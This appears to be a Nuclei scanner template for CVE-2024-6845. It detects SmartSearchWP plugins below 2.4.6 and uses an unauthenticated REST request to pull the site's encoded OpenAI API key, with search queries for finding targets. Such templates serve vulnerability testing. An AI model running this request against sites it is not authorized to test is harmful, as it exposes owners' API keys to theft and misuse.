id: CVE-2024-6845

info:
  name: SmartSearchWP < 2.4.6 - OpenAI Key Disclosure
  author: s4e-io
  severity: medium
  description: |
    The plugin does not have proper authorization in one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key.
  remediation: Fixed in 2.4.6
  reference:
    - https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6845
  metadata:
    max-request: 2
    verified: true
    vendor: webdigit
    product: smartsearchwp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/smartsearchwp"
    fofa-query: body="/wp-content/plugins/smartsearchwp"
  tags: cve,cve2024,exposure,wp,wordpress,wp-plugin,smartsearchwp

# Run the second request only if the first one matched.
flow: http(1) && http(2)

http:
  # Request 1: confirm the plugin is present on the site (internal matcher, not reported on its own).
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/smartsearchwp")'
          - 'status_code == 200'
        condition: and
        internal: true

  # Request 2: call the api-key REST endpoint without authentication.
  - raw:
      - |
        POST /wp-json/wdgpt/v1/api-key HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"key": "U2FsdGVkX1+X"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        part: body
        name: api-key
        regex:
          - '"([^"]+)"'
# digest: 4b0a0048304602210092fc3bf9edc1308d1cd7e13efa435ba2592ef1844574a598d48fcfa7c6f28340022100ce6056a70232fd730d9a94c2128feb16857c2f1002ee9c7646d5d965e0690ce4:922c64590222798bb761d5b6d8e72950